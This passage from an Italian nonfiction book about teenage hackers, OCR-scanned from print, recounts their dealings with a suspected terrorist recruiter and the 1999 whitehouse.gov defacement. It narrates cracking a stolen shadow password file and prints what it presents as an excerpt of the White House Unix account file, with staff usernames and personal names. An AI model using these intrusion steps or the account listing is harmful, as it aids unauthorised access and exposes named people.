vanile. “Speravo ancora che mi desse dei soldi,” aggiunge. 

Il collegamento con il dirottamento fu altra benzina buttata 
su un fuoco che Khalid aveva acceso da tempo. A un certo pun- 
to, apparentemente stanco dell’incapacità dei ragazzi di fornire 
le informazioni richieste, Khalid aveva provato ad aumentare la 
pressione su di loro. Il giornalista Niall McKay, nello stesso arti- 
colo pubblicato da Wired.com, scriveva di aver visto un vecchio 
messaggio Irc inviato da Khalid ai giovani, nel quale minacciava 
di farli uccidere se lo avessero denunciato al Fbi. McKay scris- 
se di aver visto anche un altro messaggio del pakistano ai ragaz- 
zi: “Voglio saperlo: [qualcuno] ha parlato ai federali di me?”. E 
in un altro punto: “Digli [che se lo hanno fatto], sono carne mor- 
ta. Li farò seguire da dei tiratori scelti”.5 


Comrade viene beccato 


La situazione si stava facendo problematica, ma era sul pun- 
to di degenerare ulteriormente. Pochi giorni dopo che Comrade 
era riuscito a penetrare nel sistema legato a Siprnet, suo padre 
fu fermato mentre si recava al lavoro in auto. I poliziotti gli dis- 
sero: “Vogliamo parlare con tuo figlio”, e gli mostrarono un man- 
dato di perquisizione. Comrade ricorda: 


Erano alcune persone della Nasa, del Dipartimento della difesa e del 

Fbi. In tutto erano dieci o dodici agenti e anche alcuni poliziotti. 

Avevo messo le mani in alcune caselle della Nasa, avevo installato 

uno sniffer su ns3.gtra.mil, solo per prendere alcune password. Ma 

come effetto collaterale, aveva catturato anche delle e-mail. Mi dis- 

sero che per questo ero accusato di intercettazione illegale. E poi 
per i computer della Nasa mi accusarono di violazione o infrazione 

di copyright. E altre cose. 


` Ibid. 
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Proprio il giorno prima, un amico mi avevo detto: “Amico, ci bec- 
cheranno presto”. Stava dando di testa. Pensai: “Sì, ha ragione”. Co- 
sì avevo cancellato il mio disco rigido. 


Ma Comrade non era stato meticoloso nel lavoro di pulizia. 
i ` . . $ . . . . - . 
Avevo dimenticato i vecchi dischi rigidi che si trovavano sulla 
mia scrivania.” 


Mi interrogarono. Io ammisi e dissi: “Mi dispiace, questo è quello 
che ho fatto, questo è il modo in cui ripararlo, non lo farò più”. Lo- 
ro risposero, tipo: “Va bene, non ti consideriamo un criminale, non 
lo fare più. Se lo fai di nuovo, uscirai di qui in manette”. Si presero 
i miei computer, le periferiche e i dischi rigidi separati e se ne an- 
darono. 


In seguito cercarono di ottenere da Comrade la password per 
accedere ai suoi dischi rigidi crittati. Quando lui gli rispose di no, 
gli dissero che sapevano come craccare le password. Ma Com- 
rade ne sapeva di più: aveva usato la crittazione del software Pgp 
e la sua password “era lunga circa cento lettere”. Eppure insiste 
che non è difficile da ricordare, sono tre delle sue citazioni pre- 
ferite attaccate, che formano un'unica stringa. 

Comrade non li sentì più per circa sei mesi. Poi un giorno ven- 
ne a sapere che il governo stava per denunciarlo. Il giorno in cui 
finì in tribunale, era stato denunciato per quello che il pubblico 
ministero aveva definito “lo spegnimento di tre settimane dei com- 
puter della Nasa e l’intercettazione di migliaia di messaggi di po- 
sta elettronica all’interno del Dipartimento della difesa”. 

Come so fin troppo bene, i presunti “danni” reclamizzati dai 
pubblici ministeri e i danni nella vita reale sono a volte piuttosto 
differenti. Comrade aveva scaricato dei software dal Centro aero- 
spaziale “Marshall” della Nasa in Alabama usati per controllare la 
temperatura e umidità della Stazione spaziale internazionale; il 
governo affermò che il fatto aveva causato per tre settimane la chiu- 
sura di certi sistemi informatici. L'attacco al Dipartimento della di- 
fesa offriva dei motivi di preoccupazione più realistici: Comrade 
era entrato nel sistema informatico dell’Agenzia della difesa per la 
riduzione delle minacce e vi aveva installato una “backdoor” che 
gli permetteva di entrare in qualsiasi momento. 

Il governo considerava ovviamente questo grave caso come 
monito per altri ragazzini hacker, e sul suo arresto si prodigò al 
massimo per dargli risalto sulla stampa, affermando che si trat- 
tava della persona più giovane mai arrestata per hacking per un 
crimine federale. Il ministro della Giustizia, Janet Reno, rilasciò 
anche una dichiarazione che diceva in un passaggio: “Questo ca- 
so, che segna la prima volta in cui un giovane hacker sconterà 
una pena in una struttura detentiva, dimostra che prendiamo sul 
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serio l'intrusione informatica e che stiamo lavorando con i no- 
stri colleghi per l'applicazione delle leggi che combattono in mo- 
do aggressivo questo problema”. 

Il giudice comminò a Comrade sei mesi di carcere seguiti da 
sei mesi di probation,$ da iniziare a scontare alla fine del semestre 
scolastico. La madre di Comrade era ancora viva all’epoca; assun- 
se un nuovo avvocato, ottenne la scrittura di diverse lettere, pre- 
sentò ai giudici quello che Comrade chiama “un caso completa- 
mente nuovo”, e, incredibilmente, riuscì a ottenere uno sconto del- 
la pena agli arresti domiciliari seguiti da quattro anni di probation. 

A volte nella vita non riusciamo a cogliere il meglio dalle op- 
portunità che ci vengono offerte. “Rimasi agli arresti domicilia- 
ri e stavo scontando il periodo di probation. Accaddero diverse 
cose, iniziai ad andare a troppe feste, così mi spedirono alla ria- 
bilitazione.” Tornato dalla riabilitazione, Comrade ottenne un la- 
voro in una azienda che faceva affari su Internet e avviò il suo 
business online. Ma lui e il funzionario della probation non riu- 
scivano a incontrarsi di persona e Comrade venne alla fine spe- 
dito in prigione. Aveva solo sedici anni e veniva arrestato per azio- 
ni che aveva commesso all’età di quindici anni. 

Non ci sono tutti questi giovani nel sistema di prigioni fede- 
rali; il posto in cui fu spedito si rivelò un “campo” (apparente- 
mente un termine appropriato) in Alabama che ospitava solo die- 
ci prigionieri e che Comrade descrive “più come una scuola: por- 
te chiuse a chiave e fili spinati, ma per il resto senza avere mol- 
to della prigione”. Non doveva neanche andare a scuola perché 
aveva già finito le superiori. 

Tornato a Miami, e ancora in libertà vigilata, a Comrade fu 
data una lista di hacker cui non era autorizzato a parlare. “Nella 
lista c'erano questo tizio, quell’altro e ne0h.” Solo “ne0h” era co- 
nosciuto dal governo federale esclusivamente attraverso pseudo- 
nimo. “Non avevano idea di chi fosse. Se io avevo accesso a due- 
cento cose, lui lo aveva a mille,” dice Comrade. “ne0h era molto 
scaltro.” Per quel che ne sanno entrambi, il braccio della legge non 
è ancora riuscito ad affibbiargli un nome o a localizzarlo. 


Si indaga su Khalid 


Khalid era il militante combattente che diceva di essere o so- 
lo un impostore che tirava i fili dei ragazzi? O forse era un’ope- 


€ La probation consiste nella sospensione della pena in cambio della pro- 
messa del rispetto da parte del condannato di alcune norme di buona condotta. 
È assimilabile, con alcune differenze, alla nostra libertà vigilata. [N.d.T.] 
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razione del Fbi per sondare fin dove i giovani hacker erano di- 
sposti a spingersi? In un'occasione o nell'altra, tutti gli hacker che 
ebbero a che fare con Khalid si insospettirono che non fosse ve- 
ramente un militante; e tuttavia l’idea di fornire delle informa- 
zioni a un agente straniero sembra averli disturbati molto meno 
dell’idea che l'uomo potesse ingannarli. Come dice Comrade: “Mi 
chiesi per molto tempo chi fosse [Khalid]. Non sapevo se fosse 
un federale o quello che diceva di essere. Parlando con ne0h e 
parlando con lui, mi convinsi fosse abbastanza onesto. Ma non 
presi mai soldi da lui, quello fu un limite che non volli superare”. 
(In un momento precedente della conversazione, quando aveva 
menzionato l'offerta di Khalid di diecimila dollari, era sembrato 
colpito dalla somma. Avrebbe veramente rifiutato i soldi se i suoi 
sforzi fossero andati in porto e se Khalid lo avesse veramente pa- 
gato? Forse anche Comrade stesso non conosce veramente la ri- 
sposta a questa domanda.) 

ne0h sostiene che Khalid “sembrava del tutto professiona- 
le” ma ammette di aver avuto dei dubbi nel corso del tempo sul 
fatto che fosse veramente un combattente. “Ogni volta che par- 
lavo con lui, pensavo fosse un cazzaro. Ma dopo aver fatto del- 
le ricerche con alcuni amici che aveva contattato e cui aveva da- 
to altre informazioni, pensammo fosse veramente chi diceva di 
essere.” 

Un altro hacker, SavecOre, incontrò una persona su Irc che 
diceva di avere uno zio nel Fbi che poteva garantire l'immunità 
a un intero gruppo di hacker chiamato Milw0rm. “Pensai che que- 
sto sarebbe stato il segnale per il Fbi che non eravamo ostili,” dis- 
se SavecOre al giornalista McKay in un'intervista via e-mail. “Co- 
sì gli diedi il mio numero di telefono. Il giorno dopo ricevei una 
chiamata dal cosiddetto agente del Fbi, ma aveva un accento paki- 
stano incredibilmente marcato.” 

“Disse che il suo nome era Michael Gordon e che faceva par- 
te del Fbi di Washington,” disse SavecOre al giornalista. “Realiz- 
zai quindi che si trattava dello stesso Ibrahim.” Mentre alcune 
persone si chiedevano se il presunto terrorista non facesse parte 
di un'operazione di test del Fbi, SavecOre giungeva alla conclu- 
sione opposta: che l’uomo che affermava di essere un agente del 
Fbi fosse il terrorista stesso, che cercava di verificare se i ragaz- 
zi erano pronti a denunciarlo. 

Lidea che si potesse trattare di un'operazione del Fbi non 
sembra reggersi in piedi. Se il governo federale avesse voluto sco- 
prire che cosa questi ragazzi erano capaci di fare, avrebbero mes- 
so in giro dei soldi. Quando il Fbi pensa che una situazione è ab- 
bastanza seria da mettere in piedi un'operazione di test, investo- 
no dei soldi nell'impresa. Promettere mille dollari a ne0h e poi 
non pagarlo non avrebbe avuto alcun senso. 
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Apparentemente, solo un hacker ricevé veramente dei soldi 
da Khalid: Chameleon. “Una mattina aprii la cassetta della posta 
e vi trovai un assegno da mille dollari con un numero da chia- 
mare a Boston,” dice Chameleon, citato da un altro articolo di 
“Wired News” (4 novembre 1998). Khalid aveva capito che Cha- 
meleon aveva le mappe delle reti telematiche governative; Vasse- 
gno era il pagamento delle mappe. Chameleon riscosse l'assegno. 
Due settimane dopo fu perquisito in casa e interrogato dal Fbi 
sul pagamento, il che solleva la domanda interessante di come il 
governo fosse a conoscenza dei mille dollari. Tutto questo prima 
dell'11 settembre, quando il Fbi era attento soprattutto ai crimi- 
ni nazionali e prestava un'attenzione minima alla minaccia ter- 
rorista. Chameleon ammise di aver preso dei soldi ma ribadì al 
giornalista di “Wired News” di non aver fornito le mappe delle 
reti dei computer del governo. 

Anche se Chameleon aveva confessato di aver accettato dei 
soldi da un terrorista straniero, il che gli avrebbe potuto valere 
una denuncia per spionaggio e la possibilità di una condanna 
molto pesante, nessuna accusa fu mai formulata, il che rende il 
mistero ancora più fitto. Forse il governo voleva solo che si spar- 
gesse la voce nella comunità hacker che fare affari con agenti 
stranieri poteva essere rischioso. Forse l'assegno non proveniva 
da Khalid, dopotutto, ma dal Fbi. 

Poche persone conoscono la vera identità di Chameleon e lui 
ci tiene molto affinché rimanga tale. Volevamo raccogliere la sua 
versione della storia. Si è rifiutato di parlarne (se non per dire che 
pensava che Khalid fosse un agente federale che fingeva di essere 
un terrorista.) Se mi fossi trovato nella sua posizione, probabil- 
mente anch'io non avrei voluto essere intervistato sulla questione. 


Harakat ul-Mujaheddin 


Mentre cercava i log delle chat Irc, McKay scoprì che Khalid 
a un certo punto si era descritto ai giovani hacker come un mem- 
bro di Harakat-ul-Ansar.” Secondo la South Asia Intelligence Re- 
view, “l’Harakat-ul-Ansar era considerata un’'organizzazione ter- 
rorista da parte degli Stati Uniti a causa della sua associazione 
con il terrorista esiliato Osama bin Laden nel 1997. Per evitare 
le ripercussioni della messa al bando degli Stati Uniti, il gruppo 
era stato rinominato Harakat-ul-Mujaheddin nel 1998” .3 

Il Dipartimento di stato degli Stati Uniti ha messo ripetuta- 
mente in guardia su questo gruppo. Un comunicato recita: “Fun- 


? Ibid. 
8 Dal sito sapt.org, South Asia Intelligence Review. 
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zionari pakistani dissero che un'incursione aerea degli Stati Uni- 
ti del 23 ottobre [2001] aveva ucciso ventidue guerriglieri paki- 
stani che combattevano insieme ai talebani nelle vicinanze di Ka- 
bul. I deceduti facevano parte di Harakat ul-Mujaheddin... [che] 
era stato inserito dal Dipartimento di stato nell'elenco ufficiale 
delle organizzazioni terroriste nel 1995”.° 

In effetti Harakat è oggi uno dei trentasei gruppi indicati dal 
Dipartimento di stato come organizzazioni terroriste straniere. 
Il nostro governo, in altre parole, lo considera uno dei peggiori 
attori sulla faccia del pianeta. 

Ovviamente i giovani hacker non sapevano questo. Per loro, 
era tutto un gioco. 

Per quel che riguarda Khalid, un maggiore generale delle for- 
ze armate, parlando di sicurezza dell’informazione nell’aprile 
2002, confermò che egli era un terrorista, parlando al suo pub- 
blico dei legami tra gli hacker e “Khalid Ibrahim del pakistano 
Harakat-ul-Ansar”.!° A ogni modo, il generale sembrava agitato 
dal fatto che Khalid non si trovasse in Pakistan, ma nel paese stes- 
so del generale, a Dehli, in India. 


Dopo il disastro dell'11 settembre 


Alcuni hacker manipolano e ingannano. Si fanno beffe dei si- 
stemi informatici facendo credere loro di possedere l’autorizza- 
zione che hanno in realtà rubato, praticano il social engineering 
per manipolare le persone onde raggiungere i loro scopi. Tutto 
questo significa che quando parli a un hacker, devi ascoltare at- 
tentamente per vedere se quello che ti sta dicendo, e il modo in 
cui lo sta dicendo, suggerisce che può essere creduto. A volte non 
ne sei sicuro. 

Il mio coautore e io non siamo sicuri di quello che ne0h ci ha 
detto della sua reazione all’11 settembre. Pensiamo che sia suffi- 
‘ciente condividerlo con il lettore: 


Sai quanto ho pianto per questo? Sentii che la mia vita era finita. 


Questa considerazione era accompagnata da una strana ri- 
sata nervosa, che significava cosa? Non siamo in grado di dirlo: 


? “The United States and the Global Coalition Against Terrorism, September- 
December 2001: A Chronology”, www.state.gov/r/pa/ho/pubs/fs/5889.htm. 

10 Discorso del general maggiore Yashwant Deva, Avsm, (Retd), President Ie- 
te, on “Information Security” all'India International Centre, New Dehli, 6 aprile 
2002: 
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Il pensare che forse avevo qualcosa a che farci. Se fossi entrato nei 
sistemi della Lockeed Martin o della Boeing e avessi ottenuto più 
informazioni, avrebbero potuto usarle. Fu un momento molto brut- 
to per me e per l'America. 

Piansi perché non avevo mai pensato di denunciarlo. Non avevo usa- 
to la mia capacità di giudicare. Questa è la ragione per cui mi as- 
sunse per fare tutte quelle cose... 

Se avessi avuto anche solo il mignolo di una mano nel World Trade 
Center... [Il pensiero] era assolutamente devastante. 

In verità ho perso tre amici nel World Trade Center; non sono mai 
stato così male. 


Molti hacker sono adolescenti o sono anche più giovani. È 
forse troppo presto perriconoscere il pericolo potenziale che com- 
porta il rispondere alle richieste di qualcuno che potrebbe mi- 
nacciare il nostro paese? Personalmente, mi piace pensare che 
l'11 settembre abbia reso gli hacker americani — anche quelli mol- 
to giovani — sospettosi, più difficili da raggirare da parte di un 
terrorista. Spero solo di avere ragione. 


L'intrusione nella Casa Bianca 


La storia della sicurezza informatica corre in un certo senso 
parallela all’antica storia della crittografia. Per secoli, i produt- 
tori di codici hanno ideato dei sistemi di cifratura che hanno sem- 
pre definito “impenetrabili”. Anche oggi, in un'epoca in cui i com- 
puter che possono cifrare istantaneamente un messaggio che usa 
un one time pad,!! o una chiave contenente centinaia di caratte- 
ri, la maggior parte dei codici sono ancora penetrabili. (Lorga- 
nizzazione degli Stati Uniti preposta alla produzione dei codici 
e alla decodificazione, la National Security Agency, rivendica una 
quantità di computer superveloci e superpotenti.) 

La sicurezza informatica è come un gioco continuo del gatto 
e del topo, con gli esperti di sicurezza da un lato e gli intrusi dal- 
l’altro. Il sistema operativo Windows contiene decine di milioni 
di linee di codice. E ovvio che qualsiasi software di dimensioni 
imponenti conterrà inevitabilmente dei punti deboli che gli hacker 
più accorti finiranno per scoprire. 

Nel frattempo, i lavoratori delle aziende, i burocrati e a volte 
anche i professionisti della sicurezza installeranno un nuovo com- 
puter o una nuova applicazione e trascureranno i passi per cam- 


U La crittografia one time pad, o sistema di Vernam, si basa sul principio che 
la chiave per aprire il messaggio di testo è della stessa lunghezza del messaggio 
stesso. Il termine “pad” (blocchetto) deriva dal fatto che i primi materiali utiliz- 
zati per implementare il sistema erano dei blocchetti di cartagommata. [N.4.7.] 
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biare la password assegnata automaticamente, o per costruirne 
una ragionevolmente sicura, lasciando il sistema in uno stato vul- 
nerabile. 

Se leggete le notizie riguardanti gli attacchi e le intrusioni de- 
gli hacker, sapete già che i siti militari e governativi e persino il 
sito della Casa Bianca, sono già stati compromessi. In alcuni ca- 
si ripetutamente. 

Entrare in un sito web e defacciarne una pagina è un conto, 
la maggior parte delle volte è un'operazione semplice, se non ad- 
dirittura noiosa. Eppure, molte persone si servono di una sola 
password per usi differenti; se l'intrusione in un sito conduce al- 
la cattura di alcune password, gli attaccanti potrebbero ritrovar- 
si nella posizione di poter accedere ad altri sistemi della rete lo- 
cale e fare molti più danni. ne0h dice che nel 1999 lui e altri due 
membri del gruppo hacker gLobaLheLL fecero proprio questo, 
in uno dei punti più sensibili degli Stati Uniti: la Casa Bianca. 


Credo che alla Casa Bianca stessero reinstallando il loro sistema ope- 
rativo. Avevano tutta la configurazione in automatico. E in quella fi- 
nestra di dieci, quindici minuti, Zyklon e MostFearD riuscirono a 
entrare, ottenere il file “shadow” con le password, craccarlo, entra- 
re e cambiare il sito. Ero proprio lì mentre lo facevano. 
Fondamentalmente si trovarono nel posto giusto al momento giu- 
sto. Accadde per caso, fu solo un colpo di fortuna se capitò loro di 
essere online proprio nel momento in cui lavoravano sul sito. 
Avevamo discusso nella chat room di gLobaLheLL. Fui svegliato da 
una telefonata intorno alle tre di notte in cui mi dicevano che lo sta- 
vano facendo. Dissi: “Merda. Provateci”. Schizzai al computer. Co- 
me previsto, ce la fecero. 

MostFearD e Zyklon fecero la parte maggiore del lavoro. Mi diede- 
ro il file “shadow” da craccare il più rapidamente che potessi. Ot- 
tenni una [password], che era una parola semplice del dizionario. 
Era tutto lì. 


ne0h ci ha fatto avere una parte di quello che dice essere il fi- 
le con le password che gli altri ottennero e gli passarono. File che 
contiene un elenco di quelli che sembrano essere alcuni degli 
utenti autorizzati dello staff della Casa Bianca!?: 


12 Confermare questa informazione è difficile. Poiché questo attacco è avve- 
nuto sotto amministrazione Clinton, nessuna delle persone elencate sta lavoran- 
do alla Casa Bianca al momento. Ma sono disponibili alcuni frammenti. Monty 
Haymes lavorava come cameraman. Cristopher Haymes è il nome di un giornali- 
sta del giornale britannico “Financial Times”; da quello che siamo riusciti ad ac- 
certare, non esisteva un impiegato omonimo della Casa Bianca, Debra Reid è una 
fotografa dell’Associated Press. Nessuno di nome Connie Colabatisto sembra aver 
mai lavorato alla Casa Bianca; una donna con quel nome è (o era) sposata a Gene 
Colabatisto, che era presidente della società Solutions at the Space Imaging, ma 
non c'è un collegamento evidente con la persona del team della Casa Bianca. 
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root:x:0:1:Super-User:/:/sbin/sh 

daemon:x:1:1::/: 

bin:x:2:2::/usr/bin: 

sys:x:3:3::/: 

adm:x:4:4:Admin:/var/adm: 

uucp:x:5:5:uucp Admin:/usr/lib/uucp: 
nuucp:x:9:9:uucp 
Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico 
listen:x:37:4:Network Admin:/usr/net/nls: 
nobody:x:60001:60001:Nobody:/: 
noaccess:x:60002:60002:No Access User:/: 
nobody4:x:65534:65534:SunOS 4.x Nobody:/: 
bing:x:1001:10:Bing Feraren:/usr/users/bing:/bin/sh 
orion:x:1002:10:Christopher 
Adams:/usr/users/orion:/usr/ace/sdshell 
webadm:x:1130:101:web 
Administrator:/usr/users/webadm:/bin/sh 
cadams:x:1003:10:Christopher 
Adams:/usr/users/cadams:/usr/ace/sdshell 
bartho_m:x:1004:101:Mark 
Bartholomew:/usr/users/bartho_m:/usr/ace/sdshell 
monty:x:1139:101:Monty Haymes:/usr/users/monty:/bin/sh 
debra:x:1148:101:Debra Reid:/usr/users/ 
debra:/bin/sh 

connie:x:1149:101:Connie 
Colabatistto:/usr/users/connie:/bin/sh 
bill:x:1005:101:William Hadley:/usr/users/bill:/bin/sh 


Questo testo è scritto nella forma di un file di password di 
Unix o Linux, del genere usato quando le password crittate sono 
archiviate in un file separato e protetto. Il comando “sdshell”, 
presente su alcune linee, suggerisce che questi utenti, per sicu- 
rezza aggiuntiva, erano in possesso di un piccolo strumento elet- 
tronico chiamato “Rsa Secure Id”, che mostra un numero a sei 
cifre che cambia ogni sessanta secondi. Per entrare nel sistema, 
gli utenti devono digitare il numero a sei cifre mostrato in quel 
dato momento dal loro identificativo di sicurezza, insieme a un 
numero Pin (che può essere assegnato, in alcune compagnie, o 
scelto di persona, in altre). Il sito web della Casa Bianca fu de- 
facciato al momento dell’intrusione, proprio per dimostrare che 
erano stati lì, secondo quanto dice ne0h, che ci ha dato un link 
al defacciamento.!* Oltre ad avere un simbolo del gruppo hacker 
gLobaLheLL, il messaggio comprendeva anche un logo dell’Hong 


'3http:/www.atirition.org/mirror/attrition/1999/05/10/www.whitehouse.gov/mi 
rrorhtml. 
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Kong Danger Duo. Quello era, dice ne0h, un nome falso messo lì 
per aggiungere un elemento di depistaggio. 

Da quel che ricorda ne0h, le persone responsabili per l’hack 
della Casa Bianca non provarono nessuna emozione particolare 
per essere riusciti a entrare in quello che dovrebbe essere uno dei 
primi cinque o dieci siti web più sicuri del paese. Erano “alquanto 
indaffarati a penetrare ovunque fosse possibile”, spiega ne0h, “per 
dimostrare al mondo che eravamo i migliori”. Invece di pacche 
virtuali sulle spalle a tutti, c'era, dice, più un’atieggiamento da 
“ottimo lavoro, ragazzi, ce l'abbiamo fatta finalmente, qual è il 
prossimo?”. 

Ma non era rimasto loro molto tempo per altre incursioni di 
sorta. I loro mondi stavano per andare in pezzi. E questa parte 
del racconto riporta la storia indietro, ancora una volta, al mi- 
sterioso Khalid. 

A questo punto è Zyklon, conosciuto anche come Eric Burns, 
a prendere la staffetta del racconto. Non fu mai veramente un 
membro di gLobaLheLL, dice, ma passava del tempo su Irc con 
alcuni dei ragazzi. Secondo la sua descrizione degli eventi, l’hack 
della Casa Bianca divenne possibile quando scoprì che il sito po- 
teva essere compromesso sfruttando un baco in un programma 
campione chiamato Phf, che viene usato per accedere a un data- 
base contenente un elenco telefonico sul web. Questa vulnerabi- 
lità era critica, ma sebbene le persone nella comunità hacker ne 
fossero a conoscenza, “non molti la utilizzavano”, dice Zyklon. 

Facendo una serie di mosse (specificate nella parte di rifles- 
sioni di questo capitolo), riuscì a ottenere l’accesso di root!4 a 
whitehouse.gov e a garantirsi l’accesso ad altri sistemi della rete 
locale, compreso il server di posta elettronica della Casa Bianca. 
Zyklon a quel punto aveva la capacità di intercettare qualsiasi 
messaggio tra gli addetti della Casa Bianca e il pubblico, anche 
se questi messaggi non avrebbero ovviamente rivelato alcuna 
informazione riservata. 

“Ma riuscì anche,” racconta Zyklon, “a prendere una copia 
della password e dei file shadow.” Si fecero un giro nel sito, ve- 
dendo quello che potevano trovare, aspettando fino a che le per- 
sone non iniziavano ad arrivare per lavoro. Mentre stava aspet- 
tando, ricevé un messaggio da Khalid, che diceva che stava scri- 
vendo un articolo su alcune intrusioni recenti e chiedeva a Zyk- 
lon se aveva da raccontargli qualcuno degli ultimi exploit. “Così 
gli dissi che proprio in quel momento ci trovavamo sul sito del- 
la Casa Bianca,” dice Zyklon. 

Nel giro di un paio d’ore da quello scambio, racconta Zyklon, 


14 Avere l’accesso di root a un server significa controllare quella macchina 
come l'amministratore del sistema. [N.d.7.] 
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videro apparire uno sniffer sul sito: un amministratore di siste- 
ma stava cercando di vedere che cosa stava accadendo e cercan- 
do di identificare le persone sul sito. Una pura coincidenza? O 
aveva forse un motivo particolare per essere sospettoso in quel 
momento particolare? Ci sarebbero voluti mesi prima che Zyk- 
lon scoprisse la risposta. In quel momento, non appena scopri- 
rono lo sniffer, i ragazzi staccarono la spina, uscirono dal sito e 
sperarono di essersi accorti dell'amministratore prima che que- 
sti si fosse accorto di loro. 

Ma avevano colpito il proverbiale nido di vespe. Circa due set- 
timane dopo il Fbi arrivò in forze e rastrellò tutti i membri di 
gLobaLheLL che era riuscita a identificare. Oltre a Zyklon - al- 
l'epoca diciannovenne, arrestato nello stato di Washington ~ pre- 
sero anche MostHateD (Patrick Gregory, anch'egli diciannove an- 
ni, del Texas) e MindPhasr (Chad Davis, del Wisconsin), insieme 
ad altri. 

ne0h fu tra i pochi che scamparono alla retata. Dal posto si- 
curo remoto in cui si trovava, era infuriato, e pubblicò una pagi- 
na di defacciamento di un sito con un messaggio di sfida; stu- 
diato per la prima serata, recitava: “Statemi a sentire fottuti ba- 
stardi del Fbi. Non provate a fottere i nostri membri, o perdere- 
te. Controlliamo fbi.gov nel momento in cui sto scrivendo que- 
sto messaggio. E VOI AVETE PAURA. Siamo stati arrestati perché voi 
stupidi idioti non capite chi ha hackerato whitehouse... giusto? 
E così vi portate tutti dentro per vedere se uno di loro spiffera. 
BUONA FORTUNA, STRONZI. NON SPIFFEREREMO. Non lo capite? Ho DET- 
TO DOMINIAMO IL MONDO”. 

E firmò: “Lo spietato, ne0h”.!5 


Dopo la botta 


E così, come è potuto accadere che l'amministratore di si- 
stema stesse monitorando il sito di prima mattina? Zyklon non 
ha alcun dubbio a riguardo. Quando i pubblici ministeri prepa- 
rarono le carte per il suo caso, vi trovò una dichiarazione secon- 
do la quale le informazioni che avevano svelato l'intrusione di 
gLobaLheLL sul sito della Casa Bianca erano state fornite da un 
informatore del Fbi. Secondo i suoi ricordi, le carte dicevano an- 
che che l’informatore si trovava a Nuova Debli, in India. 

Secondo Zyklov, non ci sono dubbi. L'unica persona cui ave- 
va parlato dell’irruzione nella Casa Bianca —- l’unica persona — 


!5 Anche qui è difficile verificare. In ogni caso, il testo citato può essere visua- 
lizzato qui: http:/www.attrition.org/mirror/attrition/1999/05/26/mmic.snu.ac.kr/ 
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era Khalid Ibrahim. Uno più uno fa due: Khalid era un infor- 
matore del Fbi. 

Ma il mistero rimane. Anche se Zyklon avesse ragione, la sto- 
ria è tutta qui? Khalid era un informatore che aiutava il Fbi a in- 
dividuare dei ragazzini che intendevano condurre delle incur- 
sioni su siti sensibili? O esiste un’altra spiegazione possibile: che 
il suo ruolo come informatore era solo una metà della storia e 
che in realtà lui fosse anche il terrorista pakistano identificato 
dal generale indiano. Un uomo che giocava una partita doppia, 
aiutando la causa dei talebani mentre infiltrava il Fbi. 

Certamente le sue paure, che uno dei ragazzi potesse denun- 
ciarlo al Fbi, collimano con questa versione della storia. 

Solo poche persone conoscono la verità. La domanda è se gli 
agenti del Fbi e i procuratori federali coinvolti sono tra coloro 
che conoscono la vera storia. O furono ingannati anche loro? 

Alla fine, Patrick Gregory e Chad Davis furono condannati a 
ventisei mesi e Zyklon Burns fu condannato a quindici mesi. Tut- 

‘ti e tre hanno finito di scontare la pena e sono fuori di prigione. 


Cinque anni più tardi 


In questi giorni l’hacking è quasi solo un ricordo per Com- 
rade, ma la sua voce si ravviva quando parla “del brivido di fare 
cose che non dovresti fare, andare in posti dove non dovresti an- 
dare, sperando di imbatterti in qualcosa di fico”. 

Ma è tempo di rifarsi una vita. Dice che sta pensando al col- 
lege. Quando abbiamo parlato, era appena tornato da un giro di 
perlustrazione nelle scuole israeliane. La lingua non sarebbe un 
problema così grande, ha imparato l'ebreo alle elementari e in 
realtà era sorpreso da quanto ne ricordava. 

Le sue impressioni del paese erano ambivalenti. Le ragazze 
sembravano “veramente delle grandi” e gli israeliani molto lega- 
ti all’America: “Sembrano ammirare gli americani”. Per esempio, 
una volta era insieme ad alcuni israeliani che stavano bevendo 
una bibita gassata che non aveva mai visto, chiamata Rc Cola; 
venne fuori che era un prodotto americano. Gli israeliani spie- 
garono: “Sulle pubblicità, questo è quello che bevono gli ameri- 
cani”. Si imbatté anche in “degli umori antiamericani con per- 
sone che non erano d'accordo con la nostra politica”, ma li pre- 
se con calma: “Immagino che li incontri ovunque”. 

Aveva odiato il clima “freddo e piovoso” mentre si trovava lì. 
E poi c’era la questione del computer. Aveva comprato un porta- 
tile con Ja connessione wireless proprio per il viaggio, ma aveva 
scoperto che “gli edifici sono fatti di queste grosse pietre spesse”. 
La sua macchina poteva vedere cinque o sei network ma i segnali 
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erano troppo deboli per connettersi e aveva dovuto camminare 
venti minuti per raggiungere un posto da cui collegarsi. 

Adesso Comrade è tornato a Miami. Da adolescente con un 
reato sulla fedina penale, vive di quanto ha ereditato e sta cer- 
cando di decidere se frequentare l'università. Ha vent'anni e non 
sta facendo molto altro. 

Il vecchio amico di Comrade, ne0h, lavora per una grande 
compagnia di telecomunicazioni (un lavoro dalle 9 alle 17 “non 
è cosa buona”, dice), ma si trasferirà presto a Los Angeles per tre 
mesi per fare un lavoro manuale in cui la paga è molto più alta 
dei soldi che sta facendo ora. Adesso che sta entrando nella so- 
cietà “ufficiale”, spera di mettere da parte abbastanza soldi per 
il preacquisto di una casa nel quartiere in cui vive attualmente. 

Quando i tre mesi per il lavoretto ben pagato saranno finiti, 
anche ne0h parla di andare all’università, ma non per studiare 
informatica. “La maggior parte delle persone che ho conosciuto 
che hanno una laurea in informatica non sanno un cazzo,” dice. 
Invece, gli piacerebbe laurearsi in economia e management or- 
ganizzativo per poi entrare nel campo informatico a livello di bu- 
siness. 

Quando parla dei suoi vecchi exploit ricorda di nuovo la sua 
fissazione per Kevin. Fino a che punto immaginava di mettersi 
nei miei panni? 


Se volevo essere catturato? Volevo e non volevo. Venire presi signi- 
fica “lo posso fare, l'ho fatto”. Non è che volessi essere preso di pro- 
posito. Volevo essere arrestato in modo che avrei potuto battermi, 
sarei stato rilasciato, sarei stato l'hacker che ce l'aveva fatta. Sarei 
uscito, avrei avuto un buon lavoro ben pagato in un'agenzia gover- 
nativa e avrei fatto parte di diritto dell’underground. 


Quanto è grande la minaccia? 


L'alleanza tra terroristi determinati e giovani hacker senza 
paura potrebbe essere disastrosa per questo paese. Questo epi- 
sodio mi ha spinto a chiedermi quanti altri Khalid ci sono in gi- 
ro a reclutare ragazzi (o anche adulti non patriottici con le ca- 
pacità degli hacker) che sono affamati di soldi, riconoscimento 
personale o della soddisfazione di portare a termine compiti dif- 
ficili. I reclutatori dopo Khalid potrebbero essere più occulti e 
non così facili da identificare. 

Quando ero detenuto in attesa di processo, fui avvicinato di- 
verse volte da un signore della droga colombiano. Stava scon- 
tando l’ergastolo in una prigione federale con la possibilità della 
semilibertà. Mi fece una bella proposta: sarei stato pagato cin- 
